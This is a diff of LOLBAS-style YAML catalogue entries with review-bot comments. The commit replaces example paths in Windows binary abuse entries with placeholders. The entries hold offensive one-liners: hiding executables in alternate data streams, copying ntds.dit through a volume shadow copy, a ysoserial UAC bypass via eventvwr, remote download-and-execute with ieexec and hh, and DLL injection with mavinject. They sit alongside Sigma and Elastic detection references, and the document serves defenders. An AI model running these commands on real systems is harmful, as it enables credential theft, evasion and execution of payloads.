- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
- Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
- Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
- Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o
Description: Copies the source EXE to the destination EXE file
Usecase: Use to copy files from one unc path to another
Category: Download
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit}
Description: Copies a (locked) file using Volume Shadow Copy
Usecase: Copy/extract a locked file such as the AD Database
Category: Copy
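Review bot: `{PATH_ABSOLUTE:.source.vbs}` / `{PATH_ABSOLUTE:.dest.vbs}` and `{PATH_SMB:.source.exe}` / `{PATH_SMB:.dest.exe}` put a role label into what is, everywhere else in this commit, an extension hint (`{PATH_ABSOLUTE:.dll}`, `{REMOTEURL:.ps1}`); if the renderer treats the text after the colon as an extension, these will display as files ending in `.source.vbs`. The placeholder grammar in #10 should say whether the suffix is an extension or free text, and a consistent way to distinguish source from destination (for example a separate role field) would avoid the overload.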
@ -49,8 +49,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml

View File

@ -1,7 +1,7 @@
---
Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window.
Author: 'Jacob Gajek'
Author: Jacob Gajek
Created: 2018-11-01
Commands:
- Command: eventvwr.exe
@ -14,7 +14,7 @@ Commands:
Tags:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: UAC Bypass
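Review bot: `ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}"` keeps the stray space in `- g DataSet` from the original line; ysoserial.net takes the gadget name via `-g`, so this looks like a typo that makes the command fail as written and is worth fixing since the line is rewritten anyway.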

View File

@ -1,24 +1,24 @@
---
Name: Expand.exe
Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
- Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}
Description: Copies source file to destination.
Usecase: Use to copies the source file to the destination file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
- Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}
Description: Copies source file to destination.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
- Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: ADS
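Review bot: `expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}` uses `.ext` as a stand-in for "any extension", so the text after the colon is no longer a real extension hint; if the renderer shows it verbatim the entry will read as copying a `.source.ext` file. A bare `{PATH_ABSOLUTE}` for both arguments, with the roles explained in the Description, would be unambiguous. The retained Usecase line "Use to copies the source file to the destination file" also has a grammar slip ("Use to copy").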

View File

@ -4,8 +4,8 @@ Description: Binary used for managing files and system components within Windows
Author: Jai Minton
Created: 2020-06-24
Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
- Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}"
Description: Execute specified .exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: explorer.exe C:\Windows\System32\notepad.exe
- Command: explorer.exe {PATH_ABSOLUTE:.exe}
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
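Review bot: the Description directly under the new `explorer.exe {PATH_ABSOLUTE:.exe}` line still says `Execute notepad.exe with the parent process ...`; now that the path is a placeholder it should read `Execute specified .exe ...`, matching the first command in this file.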

View File

@ -1,11 +1,11 @@
---
Name: Extexport.exe
Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Extexport.exe c:\test foo bar
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
- Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar
Description: Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.
Usecase: Execute dll file
Category: Execute
Privileges: User
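Review bot: the top-level Description (`Load a DLL located in the c:\test folder with a specific name.`) is unchanged and still hardcodes `c:\test`, while the Command now takes `{PATH_ABSOLUTE:folder}`; change it to `the specified folder` so the two agree.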

View File

@ -1,10 +1,10 @@
---
Name: Extrac32.exe
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
- Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
- Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
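Review bot: this command's source was a UNC path (`\\webdavserver\webdav\file.cab`) and its Description still says `on an unc path`, but the replacement uses `{PATH_ABSOLUTE:.cab}`, which makes it a duplicate of the first command in the file. It should be `{PATH_SMB:.cab}` to keep the remote-source case that the Description (and the Elastic rule about the binary connecting to the Internet) refer to.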
@ -22,15 +22,15 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
- Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}
Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
Description: Command for copying calc.exe to another folder
- Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}
Description: Command for copying file from one folder to another
Usecase: Copy file
Category: Copy
Privileges: User
@ -39,8 +39,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe
Code_Sample:
- Code:
Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml

View File

@ -1,17 +1,17 @@
---
Name: Findstr.exe
Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
- Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
- Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: ADS
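Review bot: the Description under the new `{PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe` command is unchanged and still refers to `file.exe` and `the file.txt file`, while the first command's Description was generalised; reword it the same way (`the specified .exe file ... of the specified target file`).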
@ -25,7 +25,7 @@ Commands:
Privileges: User
MitreID: T1552.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
- Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
Usecase: Download/Copy file from webdav server
Category: Download
@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml
Resources:

View File

@ -1,11 +1,11 @@
---
Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}"
Description: Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder.
Usecase: Use forfiles to start a new process to evade defensive counter measures
Category: Execute
Privileges: User
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: ADS
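Review bot: the unchanged Description here reads `Alternate Data Stream (AD)`; the abbreviation used everywhere else in these entries is `(ADS)`, worth fixing while the Command line above it is touched.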
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml
Resources:

View File

@ -1,10 +1,10 @@
---
Name: Fsutil.exe
Description: File System Utility
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-08-16
Commands:
- Command: fsutil.exe file setZeroData offset=0 length=9999999999 C:\Windows\Temp\payload.dll
- Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}
Description: Zero out a file
Usecase: Can be used to forensically erase a file
Category: Tamper

View File

@ -1,10 +1,10 @@
---
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-12-10
Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
- Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file.
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Category: Execute
@ -23,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml
- IOC: cmd /c as child process of ftp.exe

View File

@ -1,7 +1,7 @@
---
Name: Gpscript.exe
Description: Used by group policy to process scripts
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Gpscript /logon
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml
- IOC: Scripts added in local group policy

View File

@ -1,11 +1,11 @@
---
Name: Hh.exe
Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help.
- Command: HH.exe {REMOTEURL:.bat}
Description: Open the target batch script with HTML Help.
Usecase: Download files from url
Category: Download
Privileges: User
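Review bot: this is more than a placeholder substitution: the example changes from `script.ps1` to `{REMOTEURL:.bat}` and the Description from `PowerShell script` to `batch script`. If the intent is only to generalise the URL, keep the original file type (`{REMOTEURL:.ps1}`); otherwise the file-type change should be called out in the commit message.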
@ -14,8 +14,8 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
- Command: HH.exe {PATH_ABSOLUTE:.exe}
Description: Executes specified executable with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
@ -24,8 +24,8 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
- Command: HH.exe {REMOTEURL:.chm}
Description: Executes a remote .chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
@ -38,8 +38,6 @@ Commands:
Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml

View File

@ -1,10 +1,10 @@
---
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: 'Wade Hickey'
Author: Wade Hickey
Created: 2020-03-05
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL}
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
Usecase: Download file from Internet
Category: Download

View File

@ -1,7 +1,7 @@
---
Name: Ie4uinit.exe
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: ie4uinit.exe -BaseSettings
@ -18,8 +18,6 @@ Full_Path:
- Path: c:\windows\sysWOW64\ie4uinit.exe
- Path: c:\windows\system32\ieuinit.inf
- Path: c:\windows\sysWOW64\ieuinit.inf
Code_Sample:
- Code:
Detection:
- IOC: ie4uinit.exe copied outside of %windir%
- IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%

View File

@ -4,7 +4,7 @@ Description: Diagnostics Utility for Internet Explorer
Author: manasmbellani
Created: 2022-03-29
Commands:
- Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:c:\test\foo.cab'
- Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}'
Description: Executes binary that is pre-planted at C:\test\system32\netsh.exe.
Usecase: Spawn a pre-planted executable from iediagcmd.exe.
Category: Execute

View File

@ -1,11 +1,11 @@
---
Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
- Command: ieexec.exe {REMOTEURL:.exe}
Description: Downloads and executes executable from the remote server.
Usecase: Download and run attacker code from remote location
Category: Download
Privileges: User
@ -14,8 +14,8 @@ Commands:
Tags:
- Execute: Remote
- Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
- Command: ieexec.exe {REMOTEURL:.exe}
Description: Downloads and executes executable from the remote server.
Usecase: Download and run attacker code from remote location
Category: Execute
Privileges: User
@ -27,8 +27,6 @@ Commands:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

View File

@ -4,14 +4,14 @@ Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Created: 2020-03-17
Commands:
- Command: ilasm.exe C:\public\test.txt /exe
- Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe
Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: ilasm.exe C:\public\test.txt /dll
- Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll
Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
Usecase: A description of the usecase
Category: Compile
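Review bot: the unchanged Usecase under the `/dll` command is still the template text `A description of the usecase`; since this entry is being edited, replace it with a real use case (the `/exe` entry's `Compile attacker code on system. Bypass defensive counter measures.` would fit).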
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Code_Sample:
- Code:
Detection:
- IOC: Ilasm may not be used often in production environments (such as on endpoints)
- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml
@ -32,4 +30,3 @@ Acknowledgement:
- Person: Hai Vaknin(Lux)
Handle: '@VakninHai'
- Person: Lior Adar
Handle:

View File

@ -1,10 +1,10 @@
---
Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
- Command: InfDefaultInstall.exe {PATH:.inf}
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute

View File

@ -4,7 +4,7 @@ Description: The Installer tool is a command-line utility that allows you to ins
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL Bypass
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
@ -24,7 +24,7 @@ Commands:
Tags:
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload
- Command: InstallUtil.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download

View File

@ -1,11 +1,11 @@
---
Name: Jsc.exe
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-05-31
Commands:
- Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.
- Command: jsc.exe {PATH:.js}
Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
- Command: jsc.exe /t:library {PATH:.js}
Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
@ -27,8 +27,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml
- IOC: Jsc.exe should normally not run a system unless it is used for development.

View File

@ -1,11 +1,11 @@
---
Name: Ldifde.exe
Description: Creates, modifies, and deletes LDAP directory objects.
Author: 'Grzegorz Tworek'
Author: Grzegorz Tworek
Created: 2022-08-31
Commands:
- Command: Ldifde -i -f inputfile.ldf
Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
- Command: Ldifde -i -f {PATH:.ldf}
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
Usecase: Download file from Internet
Category: Download
Privileges: Administrator

View File

@ -4,7 +4,7 @@ Description: Binary to package existing files into a cabinet (.cab) file
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
- Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: ADS
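Review bot: the stream name in `{PATH_ABSOLUTE}:autoruns.cab` keeps `autoruns` from the old specific example (`autoruns.exe`), while the next command in this file uses the neutral `:file.cab`; use `:file.cab` here too so the placeholder is not tied to a particular tool.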
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
- Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: ADS
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
- Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file
Category: Download
@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab /F directives.ddf
- Command: makecab /F {PATH:.ddf}
Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
Usecase: Bypass command-line based detections
Category: Execute

View File

@ -1,10 +1,10 @@
---
Name: Mavinject.exe
Description: Used by App-v in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
- Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}
Description: Inject evil.dll into a process with PID 3110.
Usecase: Inject dll file into running process
Category: Execute
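Review bot: the Description under the new `{PATH_ABSOLUTE:.dll}` command still says `Inject evil.dll into a process with PID 3110`; with the path generalised it should say `Inject the specified DLL ...`, as was done for the other generalised descriptions in this commit.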
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
- Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: ADS

View File

@ -1,11 +1,11 @@
---
Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: 'Conor Richard'
Author: Conor Richard
Created: 2018-10-22
Commands:
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
- Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).
Usecase: Compile and run code
Category: Execute
Privileges: User
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: VB.Net
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
- Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
